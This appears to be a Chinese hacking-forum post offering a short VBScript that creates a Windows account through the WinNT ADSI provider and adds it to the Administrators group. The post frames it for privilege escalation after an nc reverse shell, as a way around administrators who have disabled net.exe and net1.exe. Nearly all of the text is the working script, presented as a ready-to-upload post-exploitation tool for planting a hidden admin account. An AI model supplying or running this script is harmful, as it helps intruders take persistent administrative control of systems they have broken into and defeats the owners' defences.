真正的无net加系统用户能用的脚本。。当我们遇到提权的时候,nc反弹提权的时候,管理员把net1和net给禁用了,,我们可以上传一个脚本,,做到真正的无net加系统用户。。脚本代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | struser=wscript.arguments(0) strpass=wscript.arguments(1) set lp=createObject("WSCRIPT.NETWORK") oz="WinNT://"&lp.ComputerName Set ob=GetObject(oz) Set oe=GetObject(oz&"/Administrators,group") Set od=ob.create("user",struser) od.SetPassword strpass od.SetInfo Set of=GetObject(oz&"/" & struser & ",user") oe.Add(of.ADsPath) For Each admin in oe.Members if struser=admin.Name then Wscript.echo struser & " 建立成功!" wscript.quit end if Next Wscript.echo struser & " 用户建立失败!" |
会员登录关闭
注册会员关闭